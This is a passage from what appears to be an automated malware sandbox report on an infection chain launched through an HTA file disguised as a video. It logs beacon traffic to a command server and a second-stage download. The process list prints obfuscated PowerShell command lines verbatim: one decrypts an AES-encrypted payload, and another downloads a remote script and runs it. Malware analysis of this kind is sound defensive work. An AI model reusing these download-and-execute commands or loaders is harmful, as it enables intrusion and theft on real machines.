server-timing: cfL4;desc="?proto=TCP&rtt=1801&min_rtt=1790&rtt_var=694&sent=12&recv=25&lost=0&retrans=0&sent_bytes=2847&recv_bytes=21367&delivery_rate=1552365&cwnd=237&unsent_bytes=0&cid=c696899b3f6fb042&ts=621&x=0"
2024-12-31 07:58:30 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-31 07:58:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49928	188.114.97.3	443	5956	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 07:58:30 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=HDUHR8BAL4U User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1207 Host: imbibelubmbe.click
2024-12-31 07:58:30 UTC	1207	OUT	Data Raw: 2d 2d 48 44 55 48 52 38 42 41 4c 34 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 32 34 46 42 46 37 46 37 36 44 46 34 30 43 42 39 32 41 34 36 37 46 36 31 35 46 30 37 34 43 37 0d 0a 2d 2d 48 44 55 48 52 38 42 41 4c 34 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 48 44 55 48 52 38 42 41 4c 34 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 53 48 45 4c 4c 53 0d 0a 2d 2d 48 44 55 48 52 38 42 41 4c 34 55 0d 0a 43 6f 6e Data Ascii: --HDUHR8BAL4UContent-Disposition: form-data; name="hwid"424FBF7F76DF40CB92A467F615F074C7--HDUHR8BAL4UContent-Disposition: form-data; name="pid"1--HDUHR8BAL4UContent-Disposition: form-data; name="lid"jMw1IE--SHELLS--HDUHR8BAL4UCon
2024-12-31 07:58:31 UTC	1126	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 07:58:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=igomfl2ot25t6miv1sf7ispf7u; expires=Sat, 26 Apr 2025 01:45:10 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hdA9p2aiqnV97gK0AQ6b864fROH7aAo2f1QNRjS1j76d2jozEv9nG6W7UFKo0kb%2FhVzMO107VZ2vhhHlXkkijAAr09xI5IwVTsygRPEGWEfeYTJ7RX97rOmypEfjs2lOU%2FoDxpM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa8b9940839c411-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1497&min_rtt=1493&rtt_var=568&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2119&delivery_rate=1910994&cwnd=224&unsent_bytes=0&cid=36cb583d6ba670e4&ts=457&x=0"
2024-12-31 07:58:31 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-31 07:58:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49936	188.114.97.3	443	5956	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 07:58:31 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=3OEVAHF2KS User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1066 Host: imbibelubmbe.click
2024-12-31 07:58:31 UTC	1066	OUT	Data Raw: 2d 2d 33 4f 45 56 41 48 46 32 4b 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 32 34 46 42 46 37 46 37 36 44 46 34 30 43 42 39 32 41 34 36 37 46 36 31 35 46 30 37 34 43 37 0d 0a 2d 2d 33 4f 45 56 41 48 46 32 4b 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 33 4f 45 56 41 48 46 32 4b 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 53 48 45 4c 4c 53 0d 0a 2d 2d 33 4f 45 56 41 48 46 32 4b 53 0d 0a 43 6f 6e 74 65 6e 74 Data Ascii: --3OEVAHF2KSContent-Disposition: form-data; name="hwid"424FBF7F76DF40CB92A467F615F074C7--3OEVAHF2KSContent-Disposition: form-data; name="pid"1--3OEVAHF2KSContent-Disposition: form-data; name="lid"jMw1IE--SHELLS--3OEVAHF2KSContent
2024-12-31 07:58:32 UTC	1134	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 07:58:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=5hkbj3ak7muec5mkf8vj856b6u; expires=Sat, 26 Apr 2025 01:45:11 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3KSxjuXsf%2FKu7W0vwUOsgu%2FSNwhm4FDrVrVrBWTIyHzZwnAp1KyZ%2BJE2pOA3DevJ7gDcc6TsMptVxfw3pwRkK%2BGH%2B6Ki9%2F98JD5kp9lP0fP2sN3vnOVdzYEzkO6FAZZ0OqoFquc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa8b99a3876728a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1960&min_rtt=1957&rtt_var=740&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=1977&delivery_rate=1471774&cwnd=227&unsent_bytes=0&cid=965f2e78941a1087&ts=528&x=0"
2024-12-31 07:58:32 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-31 07:58:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49945	188.114.97.3	443	5956	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 07:58:33 UTC	267	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 115 Host: imbibelubmbe.click
2024-12-31 07:58:33 UTC	115	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 6a 4d 77 31 49 45 2d 2d 53 48 45 4c 4c 53 26 6a 3d 61 61 37 37 65 37 38 62 36 62 30 64 64 31 62 32 32 32 36 65 37 62 37 39 39 35 33 32 61 62 33 61 26 68 77 69 64 3d 34 32 34 46 42 46 37 46 37 36 44 46 34 30 43 42 39 32 41 34 36 37 46 36 31 35 46 30 37 34 43 37 Data Ascii: act=get_message&ver=4.0&lid=jMw1IE--SHELLS&j=aa77e78b6b0dd1b2226e7b799532ab3a&hwid=424FBF7F76DF40CB92A467F615F074C7
2024-12-31 07:58:33 UTC	1132	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 07:58:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9bguceb3hugat3un0ia8v794gp; expires=Sat, 26 Apr 2025 01:45:12 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I5TWJqb0FPf%2F5OY4sXY3Yn28mnzbVjDsLmx4vXUkb9%2BvtfnASXCRmrotNIOBhZZdTDEmb1pce3CkgfiVHGw1qHvFS7C4CZf5dtd7D1uPhT%2B9w9mVg%2FCgCJomsg63zPZWq1s%2BMA0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa8b9a19a6e0c86-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1605&min_rtt=1594&rtt_var=620&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=1018&delivery_rate=1731909&cwnd=109&unsent_bytes=0&cid=59beb411a01293f5&ts=560&x=0"
2024-12-31 07:58:33 UTC	218	IN	Data Raw: 64 34 0d 0a 5a 70 61 2b 79 54 5a 2b 61 66 52 57 58 54 4f 6a 31 43 38 69 76 35 73 45 72 7a 31 7a 32 5a 75 6e 46 64 6f 33 46 75 33 34 59 6e 49 39 37 5a 79 38 46 45 52 4c 6e 43 49 70 51 39 44 75 63 77 33 6a 74 47 66 4b 57 67 62 33 36 4d 39 36 71 6d 73 35 31 63 31 56 52 6c 53 67 6a 50 30 43 53 44 58 62 4a 6a 55 64 31 36 78 62 41 4a 4f 35 59 74 73 66 53 65 75 33 68 58 44 34 44 53 65 51 31 42 6c 51 45 37 53 45 36 31 34 4b 48 59 51 6c 5a 32 2b 4d 69 41 42 4a 30 2f 4a 30 32 55 67 65 73 4f 6a 53 66 50 52 45 66 6f 4b 49 50 6c 30 50 2b 4d 71 57 56 52 49 5a 71 79 55 31 55 6f 32 67 56 31 61 64 74 79 62 4a 53 56 48 6a 71 34 73 33 76 78 55 73 33 59 55 2f 0d 0a Data Ascii: d4Zpa+yTZ+afRWXTOj1C8iv5sErz1z2ZunFdo3Fu34YnI97Zy8FERLnCIpQ9Ducw3jtGfKWgb36M96qms51c1VRlSgjP0CSDXbJjUd16xbAJO5YtsfSeu3hXD4DSeQ1BlQE7SE614KHYQlZ2+MiABJ0/J02UgesOjSfPREfoKIPl0P+MqWVRIZqyU1Uo2gV1adtybJSVHjq4s3vxUs3YU/
2024-12-31 07:58:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49951	185.161.251.21	443	5956	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 07:58:34 UTC	201	OUT	GET /8574262446/ph.txt HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: cegu.shop
2024-12-31 07:58:34 UTC	249	IN	HTTP/1.1 200 OK Server: nginx/1.26.2 Date: Tue, 31 Dec 2024 07:58:34 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 329 Last-Modified: Thu, 26 Dec 2024 00:07:06 GMT Connection: close ETag: "676c9e2a-149" Accept-Ranges: bytes
2024-12-31 07:58:34 UTC	329	IN	Data Raw: 5b 4e 65 74 2e 73 65 72 76 69 63 65 70 4f 49 4e 54 6d 41 4e 61 47 65 72 5d 3a 3a 53 45 63 55 52 69 54 79 50 72 4f 74 6f 43 4f 6c 20 3d 20 5b 4e 65 74 2e 53 65 63 55 72 69 54 79 70 72 4f 74 6f 63 6f 6c 74 59 50 65 5d 3a 3a 74 4c 73 31 32 3b 20 24 67 44 3d 27 68 74 74 70 73 3a 2f 2f 64 66 67 68 2e 6f 6e 6c 69 6e 65 2f 69 6e 76 6f 6b 65 72 2e 70 68 70 3f 63 6f 6d 70 4e 61 6d 65 3d 27 2b 24 65 6e 76 3a 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3b 20 24 70 54 53 72 20 3d 20 69 57 72 20 2d 75 52 69 20 24 67 44 20 2d 75 53 65 62 41 53 49 63 70 41 52 73 69 4e 67 20 2d 55 73 45 72 41 47 65 6e 74 20 27 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 37 2e Data Ascii: [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.

Target ID:	0
Start time:	02:56:58
Start date:	31/12/2024
Path:	C:\Windows\SysWOW64\mshta.exe
Wow64 process (32bit):	true
Commandline:	mshta.exe "C:\Users\user\Desktop\Poket.mp4.hta"
Imagebase:	0xf00000
File size:	13'312 bytes
MD5 hash:	06B02D5C097C7DB1F109749C45F3F505
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	02:57:00
Start date:	31/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FRsZn($zLKrb){return -split ($zLKrb -replace '..', '0x$& ')};$VUQBu = FRsZn('C3A33C52A21C41B9F45DD91B9A3BF30CF2EC6EDD823C9CECE83AD45776A5B6CCA18208E15A52DF5B7F83353D6E23BD618F30020318AA0658A8B9202E85F786765CAAB181B34D40F3E1AFBB439A24557CA57621A37BD3FD396EFFD4A447891C80C3A87A883D5313ADDB72306D4184811757153E08EDD2EF4BECF037797B4B79F777C6223CC775BC4B03CC115C23AD1596E113A7F8E74EB4EEC5E6D17A73F590BCA9BE30FE8DE26E4F3F386BC2B0DF4C8B789F385D01CC9DEEFE7FFE963CAD5B715105E46717C1F8CA599AAC7C726247B67B2EF008D6815624C48D8921D6C026C2D761B3C73420E46D41EB38B2BE6DC3A6E728398BE20DF964E092C95FFF64376795C2EB65F33EC3620D837926668055A522E8A88AC3164B0FFA0FE44948E6327C8E69269E914364F60006F48EB7A2F9830777B3C6BC5165322AC78640320B0B34D2AA9C9EF97D71CAF1BE1EDD212144C4E5EDA5048BFFD67A1DAE7B36D7277064EDF983455E52E8A0A77BCEF0FA38AB0C8D4EA1FCA20A03B622CFD25F156452A918D62CCD80D0060DF532D92D537F9E1ECC41864005C3C9E067C14930765854957EFB5E71DDA020E9C8287B2F961F0BDC387138260ABC45FB51EA8AE2B650D5B9C6E9C5687580B83CC67FAABC67D590702C85406AB842938C6700BDEE21992168619BEA16916FB865DC5F6DF6D9F4F1B2CCA2D2BF385A560E8F04C765355464B3F06BDD88EA77E44A2D1776F2B6CD01864CFEE829FB17A5E70D006D79C119DC5F57A9A25AA984AA5B1704215FFBC39398A42CB74F3594AA3D56DAE65B45E14CC7B4611364CE10E2A98948A4408130F9C618D3F505B018949F27C940B9058868E152DD2A4787F24AD17BF0A1F6BF9DF717F3BFD33DC5A1972C3919F13AEE4CB268C7DC3F54CF3AC0EE2BA15D2C8D82C9A8C7B8B2A0FD03B7AA09EA4F38E2B6FD1C519EACEDAE21D18FB3B6CBB0A3CD5570DE3F6C90D36EAA1E063743143EBA60B985DE8361C93EC0D22BCAD34D88804A5C111C47C68EE0D30AC9C64F3AE88BA57295F333C3B513E91EF96441C281655217BA1DE5C3FDEC2419E6DDAC538710D679FF0DF83B2EBE940E136711ED6C3C0FBFAD98C9CD7FCEEB3415207ACAAA8F091CDD9D584DB90BD37D6E6AA2BE9E6344E6C4A74A99DBC82A78E28F9AABA7BAB79EF7ECD2EC5397E326870A7A51E0D74D954C0215E1BAA229E0816AABBCB00A25173C21E313511B1C978FD55355ADFBF4E15EBD0A9B52C25E32EA220C9D9DBACD18EE9CEEC99257188138D0ABBD29C4DFFC9B960A9CEC94DF767700576A1EF94D8B5F25088C95CB11F2AC671514479E6568DF04F03553A9607589926AABEEDCE4449E803E102F7E84665C1EDBE23E8C0D5DFAB8C81BC5277AAAA134C26CD84C912045FEE79030EAF24569738BDC109FE8349634563C2F5EE96E70C6932AF1AB2C27F468AA44A2B4E2ABEBB52F245AB3E0B51A5D301366672FE9F491D4F1038B32F46286F25D8D40248A896053E14BE3DA4565AB47483A26AB50D34AF15BFC76980B08272D58F9CAB8F88E13142E13805C1ECA94D3C7934EAB6A74C1BAA74CD734574037B043E95C8086CFE97D42C4B9A7F1C21BC9FE6FFEC1DAF361C9A765C5C0A9E41D0D9FDE014881D03D024F34A7EBC93790F2B789B1D7F8AF2755F7862A0E0238A32A772D6A2732B3095DAAD4EB0E7D9915B8CB5B83C7FD80951D9638EF55A6375A4B0A1A6A39486BD42703740D4739F14C284BAD645B7AEAD8AC307E2B9086D4067F09951FB60ACCFB3C645EF7029257E657DB2C75969E04CEA94922CBA886EE7FB2C5094B35B47B3E5A6D070E4C8F6BFF03BF56A6B5E69DB983EC5AC0059A752A08B6681BBF75BE4896545506145ACE95DFFDBF434E62E3EA18A82FB864DBAAF7024875DFAAD3455165F3E298C179E9C1BB64E557E51B265C18627C5213911A94A996DED9FAF3D0330D3F3E88BE2C45BB0C420751EC6D9A4B10B354AA9B10D7039997896CBC84E96ED894759B7F6EC303D431A1C284E80B0F41DD7B7095C39DFA3FFA3C5DAC6503E4E7D2A9357E4D1035C7529DAF56510661E0073D0774CC37C6D50823062C71BD864FA83B7C62B39136EF3D2B925C41C459527BD11BD88B2C0EFB234AF3A9BEC1D80B39780B48025DFF5F6C178B93DDF712850D1DF01DDF854BCDC17A251FF77FCE0C9538100E20B760941EB486C522975B34051141DC18EF0568AFA1572E0FA83A5BC2690D31086904583C27EE9C817B126F2253CF3CCD1704914D8640C18CA31D535669F9FD6A603DD53F72A57B9CD5430327727286E7BAAD13A6FFC39662E283A7FF978BFBF5FC5CC5AD1B6532DAD68D41E04F618D40AF75F747B2981066564E6D25416F3791017B463E698B280398C63BC8933C29AF09616A94C3BEA7D4DB384704BEC738B9921BF8898C01D30527E0AC949344494C49B43088E1CCC8686C23391F17452B02D5B81B43B2D2C06B9F16A23E9E9D87814CE2370D93C6FA82BA38C67929FD4899A473FE61DC37CA5A87F2EF8787A58DFA80CAB07CA991B121E35B8C81230AE958AE8E041C71E8D01DDBA8E8B5FC137E517D861E573DDF771C76B9FF74293555133275E31FC6A9DD69E2383D6D68BA4A50C71EB2A01AC0D83ED9D780D8E2C705249A5FB8BFE6075BF00425C865366BF8B7520989948982EC086CB930C60BFD2A43919A6D60A56DB6D5147D44BDA26305E434FBAEB0372ECFF4AF87A4D8C4C335E58BEF871285E7EB21F6E254351190F01B546758AEB96D90EAC30AE12B03A24FC2F97D3E421D8714C4CBAC8A57055D7B008B6C2BAF399731AA3200F812001847FB33B62F48E736887780A85C4673F47E7ED462E33E1548C32D0267151021174D334A2D5A504C69A4558F49E6F1B0219CB89D4B6D3773C0D9D1AD71754E9FF3938CBBCBFFEDDE23BA04DCE969E1D8B3904AFA17A972C310F35BCF0D222510068B1DCA603907C82B4E210FDBC369FFFC25846BB4F20E2859617B32043C903816DE80A42B6E9E87F83C3747BFD728BBC1280E82110C8C4979D26AB88E59076F703E098EF3965B72D2B9804D2E94D41B50BC31EF628704BFC95A21A38302980725E11668416D8B1446E5D0C6855E9EA62636E456872FA1A80C8E4410D6871AF6AE9E0E601497E4F1A7F61DC6F43E939B216392102D05EE16C0164C7B92D9CC1CCC6D70E28514EE6924ECEAD49A161ABD47DF4A06F7ED617E02E525D5118BC8244B9298001EAA02AA3874785A6BFCDF3F8DF9DF76F9DBC541CF7B1A069EEB3CB9550D16');$IoNU=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((FRsZn('444C5A775845534878786D7A6C446679')),[byte[]]::new(16)).TransformFinalBlock($VUQBu,0,$VUQBu.Length)); & $IoNU.Substring(0,3) $IoNU.Substring(129)
Imagebase:	0xbd0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	02:57:00
Start date:	31/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	02:57:09
Start date:	31/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext\|Member)[6].Name).(($ExecutionContext.(($ExecutionContext\|Member)[6].Name)\|Member\|Where-Object{$_.Name-like'tomd'}).Name).Invoke($ExecutionContext.(($ExecutionContext\|Member)[6].Name).(($ExecutionContext.(($ExecutionContext\|Member)[6].Name).PsObject.Methods\|Where-Object{$_.Name-like'ome'}).Name).Invoke('N-O',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://deduhko.klipzyroloo.shop/mazkk.eml';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value\|Member)\|Where-Object{$_.Name-like'nlg'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs()
Imagebase:	0xbd0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2542046628.00000000069E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	02:57:09
Start date:	31/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	02:58:23
Start date:	31/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Imagebase:	0xbd0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Function 0AA01177 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1788989367.000000000AA01000.00000010.00000800.00020000.00000000.sdmp, Offset: 0AA01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_aa01000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1ef5609a48ea132260e9a6fc8fddea9ac2a01fd68e1404638c4d808d0f86582
Instruction ID: b412b44a525594a76fc166b4e5965a00b969a5ecc3e1dcdfc8d6c412be4058d6
Opcode Fuzzy Hash: a1ef5609a48ea132260e9a6fc8fddea9ac2a01fd68e1404638c4d808d0f86582
Instruction Fuzzy Hash: F3F0F931650315ABC758C758DC92FEE73E9AB08344F040628FA06E72C0F6A45D018794

Function 05D40FC7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1789010794.0000000005D40000.00000010.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_5d40000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
Instruction ID: 17416483f995d066e3e033b9c7ec0a3e0296d9e8c0eeed770c1ab0717f253a7c
Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
Instruction Fuzzy Hash:

Function 05D40FCF Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1789010794.0000000005D40000.00000010.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_5d40000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
Instruction ID: 17416483f995d066e3e033b9c7ec0a3e0296d9e8c0eeed770c1ab0717f253a7c
Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
Instruction Fuzzy Hash:

Function 05D40FE7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1789010794.0000000005D40000.00000010.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_5d40000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
Instruction ID: 17416483f995d066e3e033b9c7ec0a3e0296d9e8c0eeed770c1ab0717f253a7c
Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
Instruction Fuzzy Hash:

Function 05D40F9F Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1789010794.0000000005D40000.00000010.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_5d40000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
Instruction ID: 17416483f995d066e3e033b9c7ec0a3e0296d9e8c0eeed770c1ab0717f253a7c
Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
Instruction Fuzzy Hash:

Function 05D40FBF Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1789010794.0000000005D40000.00000010.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_5d40000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
Instruction ID: 17416483f995d066e3e033b9c7ec0a3e0296d9e8c0eeed770c1ab0717f253a7c
